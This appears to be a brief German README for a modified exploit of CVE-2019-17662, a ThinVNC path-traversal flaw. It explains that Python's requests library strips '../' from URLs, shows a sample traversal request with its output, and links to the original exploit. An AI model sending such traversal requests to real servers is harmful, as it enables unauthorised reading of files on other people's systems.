
Exploit für CVE-2019-17662, eine Path-Traversal-Schwachstelle in ThinVNC, die eine URL-Normalisierungs-Umgehung demonstriert, um auf beliebige Dateien auf dem Zielserver zuzugreifen.
CVE-Code modifiziert
Verwendet Prepared Requests, wie im python3 requests-Modul, das ../ in URLs normalisiert, wie zum Beispiel:
Für den Code:
r = requests.get("http://123.123.123.123/../../../../../../test")
print(str(r.status_code))
Ergebnis:
GET /test HTTP/1.1
Host: 123.123.123.123
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.22.0
Ursprünglicher Exploit:
https://www.exploit-db.com/exploits/47519